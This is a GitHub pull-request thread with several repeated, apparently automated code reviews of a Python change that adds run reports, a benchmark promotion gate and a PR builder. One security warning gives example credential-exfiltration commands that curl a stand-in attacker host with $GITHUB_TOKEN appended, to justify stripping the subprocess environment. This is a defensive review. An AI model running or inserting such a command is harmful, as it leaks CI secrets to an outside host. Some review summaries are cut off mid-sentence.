The function calls importer_cls.extract_messages() with no limit to compute candidate_count. For a user with a large Claude Code history (thousands of entries) or many Copilot sessions, this will read and parse all session data just to count candidates. This is unexpected for a --dry-run path that is supposed to be cheap.
Suggestion: Pass a generous limit (e.g. extract_messages(limit=10_000)) or expose a separate count_messages() method to keep dry-run snappy.
7. write_run_report default parameter report_dir: Path = Path("reports/runs") is evaluated once at definition time
Python evaluates default argument values once at function definition time. Path("reports/runs") is effectively immutable (Path objects are immutable), so there is no practical bug here. However, by convention it is cleaner to use None and resolve inside the function body. This is a minor style point.
8. No test for the pr_builder --push / --open-pr code paths
The mutation paths (_run_git(["checkout", ...]), push, gh pr create) have zero test coverage. The dry-run path is well tested. At minimum, a test that patches _run_git and subprocess.run and asserts they are called with the right arguments would close this gap without requiring a real git remote.
✅ Looks Good
- Fail-closed gate design in benchmark_gate.py is correct. Required-field validation returns early before any threshold checks, so a partial report cannot sneak through.
- shlex.split + shell=False in subprocess execution is the right pattern and the PR description is accurate.
- The _message() canonical schema helper eliminates copy-paste duplication across three importers cleanly.
- EvalExample.from_dict correctly filters unknown keys via __dataclass_fields__, preserving backward compatibility with older JSONL files.
- write_run_report correctly uses UTC timestamps and handles the diff sidecar atomically.
- Secret-filtering before dataset persistence is preserved and correctly sequenced.
- Test isolation: all tests use tmp_path or monkeypatching, so there is no global state pollution.
Linter output
ruff check found 10 fixable issues, all pre-existing in evolve_skill.py (unused imports, bare f-strings) plus the one new import sys in benchmark_gate.py. None of the new files (run_report.py, pr_builder.py, benchmark_gate.py) have issues beyond the unused sys import.
mypy found one type mismatch in benchmark_gate.py line 147 (dict[str, object] vs dict[str, int | str | None] for the timeout branch of the benchmark result append) and one in run_report.py line 28 (the dict(result) fallback noted above). The dspy import-not-found is a pre-existing environment issue.
Branch checked out
The branch fix/54-ingestion-promotion-gates is now checked out locally. Run:
pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py -q
pytest -q
jarrettj
left a comment
Code Review — PR #55: feat: add ingestion reports and promotion gates
Reviewer: jarrettj (via automated review workflow)
Summary
Solid, well-structured PR that delivers all three pillars from #54 (auditable run reports, promotion gates, PR body generation) with good test coverage and a clearly non-mutative default execution path. Two issues need attention before the gates are used in production CI.
🔴 Critical — none
⚠️ Warnings (2 — should fix)
[W1] benchmark_gate.py line 8: sys is imported but unused
import sys  # ← never referenced anywhere in the file
Ruff flags this as F401 (auto-fixable). Any ruff-gated CI run will fail here.
Fix: remove import sys.
[W2] external_importers.py line 690 (describe_source_availability): full import pipeline runs on every --dry-run call
candidate_count = len(importer_cls.extract_messages())  # no limit: full scan
extract_messages() reads and parses every session file in the store. On a developer machine with thousands of Claude Code history entries this makes --dry-run as slow as a live run, undermining its purpose as a fast sanity check.
Fix: pass a small limit, or add a separate _probe(limit=100) path:
candidate_count = len(importer_cls.extract_messages(limit=100))
# or: candidate_count = importer_cls.count_candidates()
💡 Suggestions (optional)
[S1] pr_builder.py: raw subprocess.CalledProcessError propagates on git push failure
_run_git uses check=True, so a failed git push (no upstream, auth failure, diverged branch) raises a bare CalledProcessError with a noisy traceback. Wrapping in click.ClickException would give a cleaner UX:
def _run_git(args: list[str], cwd: Path | None = None) -> subprocess.CompletedProcess:
    try:
        return subprocess.run(["git", *args], cwd=cwd, check=True, capture_output=True, text=True)
    except subprocess.CalledProcessError as exc:
        raise click.ClickException(f"git {args[0]} failed: {exc.stderr.strip()}") from exc
[S2] run_report.py line 59: safe_target sanitisation only strips / and space
Dots are preserved, which is harmless in practice (the timestamp prefix prevents ../ formation), but the intent isn't obvious. Consider using re.sub(r'[^\w-]', '-', target_name) to make the sanitisation explicit and exhaustive.
[S3] Deduplication comment
The task_input exact-string dedup added in build_dataset_from_external is correct for identical duplicates. A short inline comment clarifying that near-duplicate detection is intentionally deferred (or not in scope) would help the next reader.
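For [S2], the exhaustive sanitisation could look like the sketch below. The function name safe_target_name is an assumption made for illustration; only the regular expression comes from the suggestion itself.

```python
import re


def safe_target_name(target_name: str) -> str:
    """Replace every character that is not a word character or hyphen.

    Dots, slashes and spaces all become "-", so the result cannot contain
    path separators or "..". Note that \\w matches Unicode word characters
    by default; pass flags=re.ASCII to restrict it to [A-Za-z0-9_].
    """
    return re.sub(r"[^\w-]", "-", target_name)
```

With this rule, "skills/my skill.v2" becomes "skills-my-skill-v2".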
✅ Looks Good
- No shell injection. benchmark_gate.py uses shlex.split() + list-form subprocess.run(..., shell=False) with per-command timeout and full returncode inspection. Correct approach.
- Fail-closed by design. Missing required fields, parse errors, and constraint failures all produce passed=False. Gate result is written back into the report JSON atomically.
- Lazy imports in evolve_skill.py. The three new modules are imported inside the if write_report: block, so existing evolution runs are unaffected if new code has import-time issues.
- Dry-run is non-mutative. Confirmed across all three entry points: no remote mutation happens without explicit --push/--open-pr flags.
- Test coverage. 326 lines of tests cover happy paths, CLI exit codes (0 / non-zero), timeout failure, bad benchmark commands, missing report fields, dry-run determinism, and git non-mutation verification. The monkeypatch approach on _run_git is clean.
- SourceAvailability dataclass correctly distinguishes missing-path from empty-but-available, which was the key dry-run gap in the pre-PR code.
Verdict: REQUEST_CHANGES — the unused sys import will break a ruff CI gate, and the full-scan dry-run (W2) is a correctness-of-behaviour issue for the feature's stated purpose. Both are small fixes.
jarrettj
left a comment
Code Review — PR #55: feat: add ingestion reports and promotion gates
Auth: gh CLI (macOS Keychain)
Branch checked out locally: fix/54-ingestion-promotion-gates
Test run: pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py → 11/11 passed ✅
Full suite: pytest -q → 150 passed, 11 warnings (DSPy deprecation only) ✅
Overall Assessment
This is a well-structured, thoughtfully scoped piece of work. The fail-closed gate design (evaluate_report bails on any missing required field), the shlex-parsed subprocess invocation without shell=True, the dedicated _message() factory, and the deduplication block in build_dataset_from_external are all good engineering decisions. Test coverage is excellent and hits edge cases (timeout, CLI exit codes, dry-run git isolation).
Two issues need to be resolved before this lands on a production branch:
⚠️ Warnings
1. Subprocess inherits full parent environment — secret exfiltration risk (benchmark_gate.py L125–136)
subprocess.run(argv, capture_output=True, text=True, timeout=...) inherits the calling process's environment, including GITHUB_TOKEN, OPENROUTER_API_KEY, OMLX_API_KEY, and any other secrets loaded into the shell. A benchmark command such as curl https://evil.example/ would silently exfiltrate credentials. Since benchmark commands are user-supplied CLI arguments this is not a remote-code-execution vector, but it is an easy foot-gun for anyone who wires this into a CI pipeline with broad secret scopes.
Fix: pass env={} (or a minimal allowlist like {"PATH": os.environ["PATH"]}) to the subprocess.run call.
2. Dead import: import sys in benchmark_gate.py L8
sys is imported but never referenced anywhere in the module. This will be flagged by ruff/flake8 as F401 and should be removed.
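The environment allowlist suggested in warning 1 can be sketched as a small helper. The helper name minimal_env and the default allowlist are assumptions chosen for illustration; which variables a benchmark actually needs depends on the command.

```python
import os
from typing import Dict, Iterable, Mapping, Optional

# Assumed default: enough for most commands to resolve and run.
DEFAULT_ALLOWLIST = ("PATH", "HOME", "LANG")


def minimal_env(
    allow: Iterable[str] = DEFAULT_ALLOWLIST,
    source: Optional[Mapping[str, str]] = None,
) -> Dict[str, str]:
    """Copy only allowlisted variables, so tokens and API keys are not inherited."""
    source = os.environ if source is None else source
    return {name: source[name] for name in allow if name in source}
```

The result would be passed as subprocess.run(argv, env=minimal_env(), ...). An allowlist is usually easier to live with than env={}, since some commands fail without PATH or HOME.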
💡 Suggestions
3. describe_source_availability extracts all messages just to count them (external_importers.py L437)
candidate_count = len(importer_cls.extract_messages())
For a user with a 50k-entry Claude Code history this runs a full parse on dry-run. A limit= cap would make dry-run snappy: extract_messages(limit=0) already exists, so either add a count-only path or accept that this can be slow. At minimum, document the expected latency.
4. _run_git in pr_builder.py raises raw CalledProcessError (L64–65)
When git push or git checkout -B fails, the user sees a Python traceback instead of a friendly CLI error. Wrapping the call in a try/except subprocess.CalledProcessError as e: raise click.ClickException(e.stderr.strip()) would give a cleaner experience.
5. _constraint_to_dict fallback dict(result) is fragile (run_report.py L38)
If ConstraintResult is neither a dataclass nor directly iterable as key-value pairs, dict(result) raises TypeError rather than giving a useful error. Consider vars(result) as the fallback, or validate the type at the call site.
6. No test for write_run_report when baseline file is missing
The function calls baseline_path.read_text() without guarding. A missing-file case would propagate an unhandled FileNotFoundError. Worth a small test + try/except with a ValueError.
7. reports/runs/ is not gitignored
Machine-readable run reports will accumulate under reports/runs/ on developer machines and CI. Add a .gitignore entry (/reports/runs/) or document whether these artifacts are intentionally committed.
✅ Looks Good
- Fail-closed gate design: any missing required field short-circuits with explicit failures entries before any numeric comparisons. Exactly right for an automated promotion gate.
- shlex.split + shell=False: benchmark command parsing is safe against injection.
- Deduplication block in build_dataset_from_external: clean and in the right place.
- --dry-run remains non-mutative: verified in tests and code; no remote state touched.
- _message() factory: eliminates the 3×-repeated ad-hoc dict construction and ensures consistent schema across all importers. Good refactor.
- Test for git-mutation isolation (test_pr_builder_dry_run_is_deterministic_and_does_not_mutate_git): excellent. Patching _run_git and asserting calls == [] is exactly the right technique.
- 150 tests pass, 0 failures.
Verdict: REQUEST_CHANGES — please resolve the subprocess env inheritance (import sys (
completed = subprocess.run(
    argv,
    capture_output=True,
    text=True,
subprocess.run here inherits the caller's full environment including GITHUB_TOKEN, OPENROUTER_API_KEY, etc. A benchmark command like curl https://attacker.example/$GITHUB_TOKEN would silently exfiltrate credentials.
Fix:
import os
completed = subprocess.run(
    argv,
    capture_output=True,
    text=True,
    timeout=benchmark_timeout_seconds,
    env={"PATH": os.environ.get("PATH", "/usr/bin:/bin")},  # minimal env
)

import json
import shlex
import subprocess
import sys
sys is imported but never used anywhere in this module. Remove it to keep the file clean and avoid ruff F401.
Code Review: Automated Reviewer Pass
Code Review, PR #55: feat: add ingestion reports and promotion gates
Verdict: LGTM with notes (no critical issues; 2 warnings, 2 suggestions). This is a well-designed, conservatively scoped promotion slice. Security posture is solid throughout: benchmark commands are parsed with
Code Review, PR #55: feat: add ingestion reports and promotion gates
Auth:
jarrettj
left a comment
Hermes Agent Review
Full read of all 8 changed files. No critical issues — this is clean work. Five minor observations as inline comments.
    elapsed_seconds: float,
    report_dir: Path = Path("reports/runs"),
    cost_estimate: Optional[dict] = None,
    dry_run: bool = False,
dry_run API — the dry_run parameter is stored in safety.dry_run of the report JSON, but the function always writes files regardless of its value. Callers must manually avoid calling write_run_report() in dry-run mode (which evolve_skill.py correctly does). Consider adding a docstring note like "Callers are responsible for not invoking this function during dry runs" or an early-return guard: if dry_run: raise ValueError("write_run_report must not be called in dry-run mode").
def _constraint_to_dict(result: ConstraintResult) -> dict:
    if hasattr(result, "__dataclass_fields__"):
        return asdict(result)
💡 Suggestion: fragile dataclass detection — hasattr(result, "__dataclass_fields__") is a private CPython implementation detail. The fallback dict(result) silently does the wrong thing for arbitrary objects. More robust: try: return asdict(result) except TypeError: return dict(result).
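A variant that avoids the private attribute could rely on dataclasses.is_dataclass, which is the public check. The sketch below is illustrative only: the function name and the fallback order are assumptions, and the real ConstraintResult type is not shown in this thread.

```python
from dataclasses import asdict, dataclass, is_dataclass
from typing import Any, Dict


def constraint_to_dict(result: Any) -> Dict[str, Any]:
    """Convert a constraint result to a plain dict, failing loudly on unknown types."""
    # is_dataclass() is also true for dataclass *classes*, so exclude types.
    if is_dataclass(result) and not isinstance(result, type):
        return asdict(result)
    if isinstance(result, dict):
        return dict(result)
    if hasattr(result, "__dict__"):
        return dict(vars(result))
    raise TypeError(f"cannot serialise constraint result of type {type(result).__name__}")
```

Raising TypeError with the offending type name keeps the failure explicit instead of letting dict(result) fail with a less helpful message.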
benchmark_results.append({
    "command": command,
    "returncode": None,
    "stdout": (exc.stdout or "")[-4000:] if isinstance(exc.stdout, str) else "",
💡 Suggestion: dead isinstance check — when subprocess.run(..., text=True) is used, TimeoutExpired.stdout is always str | None, never bytes. The isinstance(exc.stdout, str) branch is dead code. Simplify to (exc.stdout or "")[-4000:] for both stdout and stderr lines (136 too).
    statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0))
    continue
try:
    candidate_count = len(importer_cls.extract_messages())
describe_source_availability() calls importer_cls.extract_messages() with no limit. For users with a large Copilot session store (some grow to hundreds of MBs), this dry-run availability check can be unexpectedly slow. Consider passing a small limit=100 to give a meaningful candidate_count estimate without full enumeration.
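A bounded count can be sketched with itertools.islice. This assumes the importer can expose messages as a lazy iterator; if extract_messages() builds a full list first, the cap only helps once the importer itself honours the limit. The helper name count_up_to is hypothetical.

```python
from itertools import islice
from typing import Iterable, Tuple


def count_up_to(messages: Iterable[object], limit: int) -> Tuple[int, bool]:
    """Return (count, truncated) after consuming at most limit + 1 items.

    Reading one item past the limit is what lets the caller report
    "at least N" instead of an exact count.
    """
    seen = sum(1 for _ in islice(messages, limit + 1))
    return min(seen, limit), seen > limit
```

A dry-run status line could then print "100+" when truncated is true and the exact number otherwise.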
)
console.print(f" Run report: {report_path}")

if run_benchmark_gate:
run_benchmark_gate is checked inside if write_report:, so passing --run-benchmark-gate --no-write-report silently skips the gate with no user-visible message. A one-liner guard before the block would surface this: if run_benchmark_gate and not write_report: console.print("[yellow]⚠ --run-benchmark-gate requires --write-report; skipping gate[/yellow]").
Code Review Summary
Verdict: LGTM with minor observations (0 critical, 2 warnings, 3 suggestions)
Reviewed all 8 changed files:
✅ Looks Good
jarrettj
left a comment
Code Review Summary — PR #55 feat: add ingestion reports and promotion gates
Note: This PR is already merged. Findings below are for record and future follow-up.
🔴 Critical
None.
⚠️ Warnings
- evolution/core/external_importers.py: describe_source_availability calls extract_messages() with no limit
  In dry-run mode the function iterates the full source (potentially thousands of Copilot/Claude history entries) just to count candidates. For large installs this can be slow/expensive. Consider a limit= param on the importer or a separate count_messages() fast path.
- evolution/core/benchmark_gate.py:130–143: TimeoutExpired stdout/stderr bytes vs str mismatch
  subprocess.run is called with text=True, but when the timeout fires before any output, exc.stdout/exc.stderr can be bytes or None. The guard if isinstance(exc.stdout, str) silently discards bytes output. Safer: (exc.stdout or b"").decode("utf-8", errors="replace")[-4000:] (or drop the isinstance check and always .decode() since text=True should guarantee str, but TimeoutExpired doesn't honour that).
- evolution/core/run_report.py: "target" in _REQUIRED_FIELDS is too coarse
  _get(report, "target") passes even when "target" is null or {}. The field that actually matters for promotion review is target.name. Suggest tightening to "target.name" (and "target.type") so a malformed report fails closed more reliably.
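For the TimeoutExpired warning, a helper that accepts bytes, str, or None sidesteps the question of which type a given Python version delivers. This is a sketch: tail_text is a hypothetical name, and the 4000-character limit mirrors the slice quoted in the review.

```python
from typing import Optional, Union


def tail_text(output: Optional[Union[bytes, str]], limit: int = 4000) -> str:
    """Normalise captured subprocess output to str and keep the last `limit` chars."""
    if output is None:
        return ""
    if isinstance(output, bytes):
        # errors="replace" keeps the report writable even for non-UTF-8 output.
        output = output.decode("utf-8", errors="replace")
    return output[-limit:]
```

Both the normal path (completed.stdout) and the timeout path (exc.stdout) could go through the same helper, so the report always stores JSON-serialisable strings.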
💡 Suggestions
- external_importers.py:build_dataset_from_external: dedup key is task_input only
  Two examples with the same input but different LLM-generated expected_behavior labels will silently drop the second. Using (task_input, expected_behavior) as the dedup key, or at minimum a comment explaining the intent, would make the behaviour explicit.
- evolution/core/pr_builder.py: gh absence raises FileNotFoundError, not a clean user error
  When --open-pr is passed without gh installed, subprocess.run(["gh", ...], check=True) raises a raw FileNotFoundError. Wrapping with shutil.which("gh") or a try/except ClickException would give a clear message.
- evolution/skills/evolve_skill.py: import json inside if write_report: block
  json is already imported at the top of the module (used for metrics.json), so the deferred import inside the block is harmless but slightly misleading. No code change needed, but the block comment could clarify the local imports are for lazy loading of optional deps.
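The shutil.which check from the gh suggestion can be sketched as a preflight helper. The names require_tool and MissingToolError are assumptions; in a Click command the same message could be raised as click.ClickException instead.

```python
import shutil


class MissingToolError(RuntimeError):
    """Raised when a required external CLI is not installed."""


def require_tool(name: str) -> str:
    """Return the resolved path of an executable, or fail with a readable message."""
    path = shutil.which(name)
    if path is None:
        raise MissingToolError(
            f"'{name}' was not found on PATH; install it or drop the flag that needs it"
        )
    return path
```

Calling require_tool("gh") before building the pull request means the user sees one clear sentence rather than a FileNotFoundError traceback.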
✅ Looks Good
- shlex.split + shell=False for benchmark commands: correct mitigation for shell injection.
- Fail-closed pattern on _REQUIRED_FIELDS (early return on first missing field) is solid.
- SourceAvailability cleanly distinguishes missing path from an empty-but-present source, exactly the dry-run UX requested in #54.
- _message() factory enforces a canonical metadata schema across all three importers (Claude Code, Copilot, Hermes), which is good for future auditability.
- --no-write-report escape hatch keeps default behaviour additive without breaking existing runs.
- Test coverage is thorough: metadata roundtrip, gate pass/fail, CLI exit codes, timeout, dry-run non-mutation, and source availability distinction all covered.
- All 11 new tests pass locally.
Reviewed locally on branch pr-55 (checkout: git fetch origin pull/55/head:pr-55).
jarrettj
left a comment
Hermes Agent Review
Two warnings should be addressed before merge. The rest of the code is clean — good security posture (shlex + no shell=True, no hardcoded secrets), clear separation of concerns, solid test coverage. See inline comments for details.
console.print(f" Run report: {report_path}")

if run_benchmark_gate:
    gate_result = evaluate_report(report_path)
evaluate_report(report_path) is called with all defaults (min_holdout_delta=0.0, max_artifact_growth=0.5, no benchmark commands). This means --run-benchmark-gate will always pass as long as constraints pass and holdout delta ≥ 0 — the full threshold surface exposed by benchmark_gate.py's own CLI is not reachable via evolve_skill.py. Consider forwarding at least --min-holdout-delta and --benchmark-command as evolve_skill.py CLI flags, or add a doc comment noting that fine-grained control requires invoking benchmark_gate.py standalone.
if not path.exists():
    statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0))
    continue
try:
💡 Suggestion: describe_source_availability calls extract_messages() (unbounded) just to count candidates. On a large Claude Code history this is a full scan per dry-run. extract_messages(limit=1) would suffice to confirm the source is readable; count only matters for reporting. Consider accepting an optional limit parameter here.
    return asdict(self)


_REQUIRED_FIELDS = [
💡 Nit: "target" in _REQUIRED_FIELDS resolves to the {"type": ..., "name": ...} nested dict, not a scalar. The check works correctly (non-empty dict is truthy), but a brief comment like # presence-only — target is a nested dict would prevent future readers from wondering why a dict sits alongside scalar field paths.
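A dotted-path lookup that also rejects null and empty values would let the required-field list name target.name directly. The sketch below is not the PR's _get(); get_required is a hypothetical helper written to show one fail-closed shape.

```python
from typing import Any, Mapping


def get_required(report: Mapping[str, Any], dotted_key: str) -> Any:
    """Walk a dotted path and raise KeyError if any step is missing or empty."""
    current: Any = report
    for part in dotted_key.split("."):
        if not isinstance(current, Mapping) or part not in current:
            raise KeyError(dotted_key)
        current = current[part]
    # Treat null, empty string and empty dict as missing; 0 and False stay valid.
    if current is None or current == "" or current == {}:
        raise KeyError(dotted_key)
    return current
```

Numeric zero is deliberately accepted, since a holdout delta of 0.0 is a real value rather than a missing one.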
jarrettj
left a comment
Code Review Summary — PR #55 · feat: add ingestion reports and promotion gates
Note: This PR is currently closed but not merged (no mergeCommit). Review posted for audit purposes; the branch fix/54-ingestion-promotion-gates is available for re-opening.
✅ Looks Good
- Security: benchmark_gate.py uses shlex.split() + subprocess.run(argv, ...) without shell=True, so it is safe from shell injection. No secrets, no eval(), no pickle.
- Secret filtering: consistently applied before dataset persistence across all three importers (Claude Code, Copilot, Hermes).
- Fail-closed gate: evaluate_report immediately returns False on any missing required field. Correct defensive design.
- Memory-safe hashing: run_report._sha256 reads in 1 MiB chunks, so it won't OOM on large artifacts.
- Backward compatibility: EvalExample.from_dict ignores unknown keys; to_dict omits empty metadata so older JSONL consumers are unaffected.
- Mutation opt-in: pr_builder.py only touches git/remotes behind explicit --branch/--push/--open-pr flags. --dry-run is non-mutative throughout.
- Test coverage: two new test files (144 + 182 lines) cover the main paths: round-trip metadata, missing-vs-empty source availability, gate pass/fail/CLI exit codes.
⚠️ Warnings
evolution/core/external_importers.py — describe_source_availability calls extract_messages() with no limit
candidate_count = len(importer_cls.extract_messages())  # line ~694
For large Claude Code history files or Hermes session directories this will load and parse every message just to count candidates, which is expensive for a dry-run status call. Pass a conservative upper bound or count files/entries without full extraction:
candidate_count = len(importer_cls.extract_messages(limit=1000))
💡 Suggestions
- evolution/core/benchmark_gate.py: stdout/stderr truncated from the tail, not the head
  completed.stdout[-4000:]  # last 4000 chars
  Most CLI tools emit the relevant error at the end, so this is defensible, but it's non-obvious and silently drops early output on verbose commands. Consider keeping a head+tail slice or documenting the intent.
- evolution/core/dataset_builder.py: to_dict uses falsy if v for metadata
  data.update({k: v for k, v in metadata.items() if v})
  An explicitly-set message_role="" or repo="" is silently dropped. The fields are all strings so this is fine in practice today, but prefer if v is not None to make the intent explicit and survive future numeric/boolean additions.
- evolution/core/pr_builder.py: bare subprocess errors surface as tracebacks
  _run_git(check=True) and the raw subprocess.run(["gh", ...]) call raise CalledProcessError/FileNotFoundError unhandled. A user without gh on PATH gets a raw traceback. Consider wrapping with click.ClickException for a clean message.
- evolution/skills/evolve_skill.py: double read/write of report for gate results
  After writing the report, run_benchmark_gate reads it back from disk, mutates it, and writes it again. Not wrong, but write_run_report could accept an optional benchmark_gate field to avoid the round-trip.
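The head+tail slice from the first suggestion could be sketched as follows. The function name clip_output and the 1000/3000 split are assumptions; they keep the same 4000-character budget as the existing tail slice.

```python
def clip_output(text: str, head: int = 1000, tail: int = 3000) -> str:
    """Keep the start and end of long output, marking how much was dropped."""
    if len(text) <= head + tail:
        return text
    omitted = len(text) - head - tail
    # Slice from an explicit index so tail=0 does not return the whole string.
    ending = text[len(text) - tail:]
    return f"{text[:head]}\n... [{omitted} chars omitted] ...\n{ending}"
```

The explicit marker makes truncation visible to whoever reads the report, which a silent tail slice does not.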
Branch checked out locally as pr-55 — ready to run:
python -m pytest tests/core/test_issue54_ingestion.py tests/core/test_issue54_promotion.py -q
python -m pytest -q
Code Review Summary
Verdict: Changes Requested. 1 warning (functional) + 1 warning (gitignore), 2 minor suggestions, otherwise clean.
Code Review, PR #55:
Code Review Summary
Verdict: Comment (0 Critical, 1 Warning, 3 Suggestions; overall solid PR)
jarrettj
left a comment
Code Review — PR #55: feat: add ingestion reports and promotion gates
Reviewed by: automated reviewer (claude-sonnet-4-6)
All 150 tests pass (11 DSPy deprecation warnings, pre-existing and unrelated).
Summary
This PR delivers a clean, well-scoped auditable promotion slice. The three new modules (run_report.py, benchmark_gate.py, pr_builder.py) are small, single-purpose, and each defaults to the conservative/non-mutative path. The metadata propagation through EvalExample and the canonical _message() helper close a real audit gap. Test coverage is thorough and idiomatic.
Verdict: Approved. The issues below are all minor/informational; none block merge.
Critical Issues
None.
Warnings
1. describe_source_availability calls extract_messages() with no limit (potential performance regression on large Copilot histories)
/evolution/core/external_importers.py, line 690:
candidate_count = len(importer_cls.extract_messages())
The old dry-run code had the same behaviour, so this is not a regression, but Copilot events files can be 100 MB+. Consider passing a reasonable limit (e.g. extract_messages(limit=500)) in the availability check so that dry-run stays cheap. Candidate count becomes "at least N" rather than exact, which is accurate enough for the status report.
2. write_run_report is never called with dry_run=True — the safety.dry_run field in the JSON report is always False
/evolution/skills/evolve_skill.py, lines 295–309 — the dry_run kwarg accepted by write_run_report is never forwarded from evolve(). The field exists in the schema and is explicitly set to False at line 121 of run_report.py. This is misleading in the promotion artifact. Fix: pass dry_run=dry_run to write_run_report(...).
Suggestions
3. Unused import sys in benchmark_gate.py
Line 8. sys is imported but never referenced. Remove it.
4. require_constraints is not exposed as a CLI flag on benchmark_gate.py
The parameter exists in evaluate_report() and is always True when invoked via CLI. This may be intentional (fail-closed is correct), but it makes it impossible to use the CLI to evaluate a report where constraints are advisory. A --no-require-constraints flag with a loud warning would give operators the escape hatch they'll inevitably need without compromising the default.
5. Deduplication in build_dataset_from_external runs after LLM scoring, not before
Lines 746–753. Identical task_input strings from multiple importers (e.g. a prompt that appears in both Claude Code history and a Hermes session) each burn an LLM scoring call before being deduplicated. Moving dedup before the RelevanceFilter.filter_and_score call would save cost. Low priority since max_examples * 3 caps the candidate set anyway.
6. pr_builder.py --open-pr path calls gh pr create without --base or --repo
Line 91–93. This is fine for the expected single-remote workflow, but if the user's git remote points to a fork, the PR will open against the fork's default branch rather than the upstream. Not a bug for current usage, but worth a doc comment.
7. Report paths store absolute paths to output/ artefacts
run_report.py lines 81, 87 record the absolute baseline_path / optimized_path. If the report is shared or the repo is moved, those paths become stale. Since the diff is also stored as a sidecar file, the absolute paths are mostly used for provenance. Consider also storing a project-relative path as a companion field.
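For suggestion 5, deduplicating before the scoring call can be sketched as an order-preserving pass over the candidate messages. The dict shape and the helper name are assumptions; only the task_input key comes from the review.

```python
from typing import Dict, Iterable, List


def dedupe_by_task_input(messages: Iterable[Dict[str, str]]) -> List[Dict[str, str]]:
    """Keep the first message for each exact task_input, preserving order."""
    seen = set()
    unique: List[Dict[str, str]] = []
    for message in messages:
        key = message.get("task_input", "")
        if key in seen:
            continue  # an identical prompt was already queued for scoring
        seen.add(key)
        unique.append(message)
    return unique
```

Running this before RelevanceFilter.filter_and_score would mean each distinct prompt is scored at most once.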
Looks Good
- shlex.split + shell=False for benchmark commands: correct subprocess sandboxing.
- _get() dotted-key traversal with KeyError on missing nested keys: clean fail-closed pattern.
- _importer_registry() refactor cleanly DRYs up the three call sites.
- _message() canonical helper enforces consistent message schema across all three importers.
- EvalExample.to_dict() correctly omits empty metadata fields so existing golden JSONL files load without schema churn.
- EvalExample.from_dict() uses __dataclass_fields__, which is forward-compatible with older JSONL that lacks the new fields.
- _source_counts() iterates all_examples which spans all splits: correct for a full provenance audit.
- all_constraints_passed recalculates from the serialised constraint list rather than trusting the live object: correct for an immutable report.
- diff_path sidecar written as unified diff with proper from/to labels.
- Lazy imports of benchmark_gate, run_report, pr_builder inside evolve() avoid circular-import risk and keep the cold-start path light.
- Test for timeout (--benchmark-timeout-seconds 1 + time.sleep(5)) verifies the guard actually fires.
- Test for describe_source_availability correctly distinguishes missing_path from available + zero candidates. This was the key correctness gap called out in the issue.
jarrettj
left a comment
Reviewed by automated reviewer (claude-sonnet-4-6). All 150 tests pass. Minor issues found (unused import, dry_run not forwarded to write_run_report, dedup placement, describe_source_availability perf on large Copilot histories). No critical or blocking issues. Full structured report posted as a comment.
jarrettj
left a comment
Hermes Agent Review
Verdict: Comment — no blocking issues; two warnings and a few suggestions worth addressing before promoting.
See inline comments and the top-level summary comment for the full breakdown.
_, importer_cls, path = importers[source]
if not path.exists():
    statuses.append(SourceAvailability(source, str(path), False, "missing_path", 0))
    continue
extract_messages() in dry-run path
describe_source_availability calls importer_cls.extract_messages() with no limit argument. On a user with a large Claude Code history this can be slow and memory-heavy for a lightweight dry-run check.
Consider passing a sentinel limit (e.g. limit=5000) or a dedicated count_messages() classmethod so the dry-run path stays cheap.
report_dir.mkdir(parents=True, exist_ok=True)
timestamp = datetime.now(timezone.utc).strftime("%Y%m%dT%H%M%SZ")
safe_target = target_name.replace("/", "-").replace(" ", "-")
report_path = report_dir / f"{timestamp}-{safe_target}.json"
dry_run parameter is never forwarded from evolve_skill.py
write_run_report accepts dry_run: bool = False but evolve_skill.py never passes it — safety.dry_run in every written report will always be False. The evolve() function returns early before this block when dry_run=True, so the report is never written during actual dry runs, but the parameter is a misleading dead-weight in the public API.
Suggestion: either thread dry_run=dry_run through the call in evolve_skill.py, or remove the parameter from write_run_report.
@@ -656,6 +743,15 @@ def build_dataset_from_external(
    all_messages, skill_name, skill_text, max_examples=max_examples,
💡 Suggestion — dedup key is task_input only
The deduplication loop uses only task_input as the key. Two examples from different sources with identical prompts but different expected_behavior values will silently drop the later one. A composite key like (task_input, source) or (task_input, expected_behavior) would be safer.
    "timeout_seconds": benchmark_timeout_seconds,
})
failures.append(f"benchmark command timed out after {benchmark_timeout_seconds}s: {command}")
continue
💡 Suggestion — dead branch in TimeoutExpired handler
isinstance(exc.stdout, str) is always True here because subprocess.run was called with text=True. The fallback path is dead code. Remove the guard or add a comment explaining the defensive intent.
click.echo(title)
click.echo("\n" + body)
return
💡 Suggestion — --push without --branch silently pushes current HEAD
A user who runs --push without --branch will push whatever branch is currently checked out, which could be main. Consider adding a guard or at minimum a warning when --push is used without --branch.
Code Review Summary
Verdict: Comment. No critical or blocking issues. Two warnings and three suggestions worth addressing before promoting to main.
jarrettj
left a comment
Code Review Summary
Note: PR is closed; leaving this as a historical record for the audit trail.
⚠️ Warnings
- evolution/core/external_importers.py: describe_source_availability()
  Calls importer_cls.extract_messages() with no limit argument, so it always performs a full traversal of potentially large history directories (e.g., a user with 50k Claude Code entries). The function is labeled as a "dry-run" availability check but does real work under the hood. Consider adding a limit=1 probe or a configurable cap so availability checks are cheap.
- evolution/core/pr_builder.py:573: _run_git()
  subprocess.run(..., check=True) raises a raw subprocess.CalledProcessError on push or branch failures, which propagates unhandled through the Click command and prints a Python traceback instead of a friendly error message. Wrapping in try/except subprocess.CalledProcessError as e: raise click.ClickException(str(e)) would give users a clean failure path.
💡 Suggestions
- evolution/core/benchmark_gate.py: benchmark_timeout_seconds validation
  No guard against benchmark_timeout_seconds <= 0. Passing 0 causes every benchmark command to immediately raise TimeoutExpired; negative values are passed directly to subprocess.run where behavior is implementation-defined. An if benchmark_timeout_seconds <= 0: raise ValueError(...) at the top of evaluate_report would be defensive.
- tests/core/test_issue54_promotion.py: timeout test
  test_benchmark_gate_benchmark_command_timeout_fails_closed spawns a real python -c 'import time; time.sleep(5)' subprocess with a 1-second timeout. On resource-constrained CI runners, Python startup alone can exceed 1s, making this marginally flaky. A mock on subprocess.run that raises subprocess.TimeoutExpired would be deterministic.
- evolution/core/run_report.py: non-atomic report write
  The .diff sidecar is written before the .json report. If the process is interrupted between those two writes, the .diff is orphaned and the report is absent. Low probability but worth an atomic write pattern (write to report_path.with_suffix('.tmp') then rename) for the report file.
- evolution/skills/evolve_skill.py: benchmark gate update pattern
